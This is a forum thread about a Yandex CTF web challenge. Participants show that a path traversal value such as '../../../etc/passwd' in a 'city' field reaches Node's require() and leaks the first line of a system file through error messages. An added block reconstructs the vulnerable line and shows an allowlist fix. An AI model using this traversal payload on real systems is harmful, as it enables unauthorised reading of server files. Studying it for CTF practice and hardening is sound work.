
Has anyone already done the Yandex CTF?

Hmm, so that login form should be inject-able? Can't find anything useful, only thing I see is when you manually change the city value that you get an error like:

Code:
Welcome
Cannot find module '../lib/offices/-' Require stack: - /app/routes/register.js - /app/app.js - /app/bin/www
 
Could there be something useful here? After all, these errors are shown there for a reason )
Code:
NotFoundError: Not Found
    at /app/app.js:29:10
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at trim_prefix (/app/node_modules/express/lib/router/index.js:317:13)
    at /app/node_modules/express/lib/router/index.js:284:7
    at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)
    at next (/app/node_modules/express/lib/router/index.js:275:10)
    at /app/node_modules/express/lib/router/index.js:635:15
    at next (/app/node_modules/express/lib/router/index.js:260:14)
    at Function.handle (/app/node_modules/express/lib/router/index.js:174:3)
    at router (/app/node_modules/express/lib/router/index.js:47:12)
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at trim_prefix (/app/node_modules/express/lib/router/index.js:317:13)
    at /app/node_modules/express/lib/router/index.js:284:7
    at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)
    at next (/app/node_modules/express/lib/router/index.js:275:10)
    at SendStream.error (/app/node_modules/serve-static/index.js:121:7)
 
Yea the city value seems to look at a local file. So if you put: "../../../etc/passwd" then you get this error:

Code:
Unexpected token ':'

/etc/passwd:1
root:x:0:0:root:/root:/bin/bash
        ^
SyntaxError: Unexpected token ':'
    at wrapSafe (internal/modules/cjs/loader.js:1001:16)
    at Module._compile (internal/modules/cjs/loader.js:1049:27)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
    at Module.load (internal/modules/cjs/loader.js:950:32)
    at Function.Module._load (internal/modules/cjs/loader.js:790:12)
    at Module.require (internal/modules/cjs/loader.js:974:19)
    at require (internal/modules/cjs/helpers.js:93:18)
    at /app/routes/register.js:40:19
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/app/node_modules/express/lib/router/route.js:137:13)

That's a different error than when you remove a single "../", then you get a not found error. So perhaps the flag is hidden in the file system? Don't know enough of LFI to help you but sounds interesting ^^
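
The two behaviours seen in the errors above (a request value reaching `require()` in /app/routes/register.js, and raw stack traces returned to the client) are shown here from the application side. This is an added example, not part of the thread and not the CTF's code. The office names, the `body.city` field name and the handler shape are assumptions; only the `'../lib/offices/'` prefix comes from the error text.

```javascript
// Assumed shape of the vulnerable line, reconstructed from the error text only:
//   const office = require('../lib/offices/' + req.body.city);
// Any '../' in the value leaves lib/offices/, and the loader's SyntaxError
// echoes the first line of whatever file it tried to compile.

// Hardened form: the request value is only a lookup key into a fixed registry.
// In a real app each entry would be require()d once at startup with a literal path.
const OFFICES = new Map([
  ['moscow', { name: 'Moscow office' }], // constructed sample data
  ['kazan', { name: 'Kazan office' }],   // constructed sample data
]);

function loadOffice(city) {
  // Reject non-strings (arrays/objects from body parsers) and anything
  // that is not a plain lowercase key present in the registry.
  if (typeof city !== 'string' || !/^[a-z]{1,32}$/.test(city) || !OFFICES.has(city)) {
    const err = new Error('unknown office');
    err.status = 400;
    throw err;
  }
  return OFFICES.get(city);
}

// Details go to the server log; the client gets a fixed string with no
// module paths, file contents or stack frames.
function toClientResponse(err, log) {
  log(err.stack);
  const status = err.status >= 400 && err.status < 500 ? err.status : 500;
  return { status, body: status === 500 ? 'Internal error' : 'Bad request' };
}

// Hypothetical handler core: takes the parsed body, returns status and body.
function handleRegister(body, log = console.error) {
  try {
    return { status: 200, body: loadOffice(body.city).name };
  } catch (err) {
    return toClientResponse(err, log);
  }
}
```

In Express the same split is done with an error-handling middleware registered last, so no route can fall back to the default handler that prints the stack.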
 
I found this vulnerability, even found a flag, but this method allows you to read only the first line of the file. How to get the complete file?